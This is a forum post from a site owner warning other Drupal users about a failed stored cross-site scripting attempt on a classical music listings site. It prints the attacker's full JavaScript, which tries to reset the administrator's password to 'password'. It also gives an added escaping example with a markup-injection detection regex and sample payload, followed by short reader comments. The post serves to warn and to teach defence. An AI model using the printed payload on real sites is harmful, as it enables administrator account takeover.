Someone has just tried a nasty little attack on our Drupal-based site, www.bachtrack.com. The attack failed, but I thought it was worth posting a warning to others. If there's a better place to post this (a security forum somewhere else?) someone please let me know.
The attacker registered as a user, and posted a piece of JavaScript into as many places as he could find to add content to the site - including his signature and a couple of custom forms. The intention of the script was to set the passwords of all users to "password" (I've shown the script in full below).
The script didn't get executed - indicating that our site code was successful in stripping tags or converting '<' to '&lt;' in all the places it should have done. But for any novice module writers, it's a real reminder that there are people out there who will try this stuff. Quite why they would want to take control of a classical music listings site is not as clear.
Here's what they tried to run:
function alterUser() {
var text = document.documentElement.innerHTML;
var myAccountText = text.indexOf('My account');
var i = myAccountText-2;
while (! text.charAt(i).match(/[0-9]/g)) {
i--;
}
myAccountNumber = text.substring(i, myAccountText-2);
if (myAccountNumber == 1) {
/*alert(myAccountNumber );*/
var url = "http://192.168.0.2/?q=user/"; + myAccountNumber + "/edit";
document.write('');
document.write('');
window.frames['foo'].location = url;
/* Slow it down, let the load happen */
setTimeout('doNext()', 4000);
}
}
function doNext() {
var theDoc = document.getElementById('foo');
foo.document.getElementById('edit-pass-pass1').value = 'password';
foo.document.getElementById('edit-pass-pass2').value = 'password';
foo.document.getElementById('user-edit').submit();
/* Admin pass changed - TODO: alert evil overlords */
}
alterUser();
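The reason the script above stayed inert is the step the post mentions: user-supplied text was converted to entities ('<' became '&lt;') before it was put back on the page. The following is an added example, not code from the original post or from Drupal, showing that step on a signature field and a cheap audit flag for submissions that look like markup injection. The field name, the render wrapper and the sample payload are constructed for illustration.

```javascript
// Added example (not from the original post or from Drupal): server-side
// handling of a user-supplied "signature" field. Untrusted text is never
// inserted into the page as markup; it is escaped first. Field names and
// the sample payload are constructed for illustration.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Convert every character that has meaning in HTML into its entity. This is
// the "convert '<' to '&lt;'" step from the post: the browser renders the
// text literally and never parses it as a tag or attribute.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Render a signature block. The wrapper markup is ours; the user's text
// only ever appears escaped inside it, so a posted <script> tag is shown
// as text rather than executed.
function renderSignature(signature) {
  return `<div class="signature">${escapeHtml(signature)}</div>`;
}

// Cheap audit signal: does the submitted text look like an attempt to inject
// markup? Escaping already neutralises it, so this is for logging and
// review of the account, not the security boundary itself.
function looksLikeMarkupInjection(text) {
  return /<\s*(script|iframe|img|svg|object|embed)\b|on\w+\s*=|javascript:/i.test(text);
}

// Constructed sample: a signature carrying a script tag, in the spirit of
// the payload posted to the site (the tag content here is a placeholder).
const SAMPLE_SIGNATURE = 'Cheers! <script>alterUser();</script>';

// Runs the two checks on the sample and returns what would be stored/logged.
function demo() {
  const html = renderSignature(SAMPLE_SIGNATURE);
  const flagged = looksLikeMarkupInjection(SAMPLE_SIGNATURE);
  return { html, flagged };
}

if (typeof require !== 'undefined' && require.main === module) {
  const { html, flagged } = demo();
  console.log(html);                      // the <script> appears as &lt;script&gt;
  console.log('flag for review:', flagged); // true
}
```

Drupal's own API does the escaping part with check_plain() (PHP htmlspecialchars underneath); the point of the example is that plain-text fields such as signatures should go through that, or an equivalent, on output, and that a text format allowing raw HTML should never be granted to untrusted roles. The audit flag is only a convenience for spotting accounts worth reviewing.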
Comments
Many sites have their input formats (or text formats) misconfigured and allow untrusted users to post arbitrary HTML. Glad to see your site is not one of them.
This is a lovely variant on the password change scripts that have been floating around the internet for some time.
Does mod_security protect us from attacks like that, even if modules are not written securely?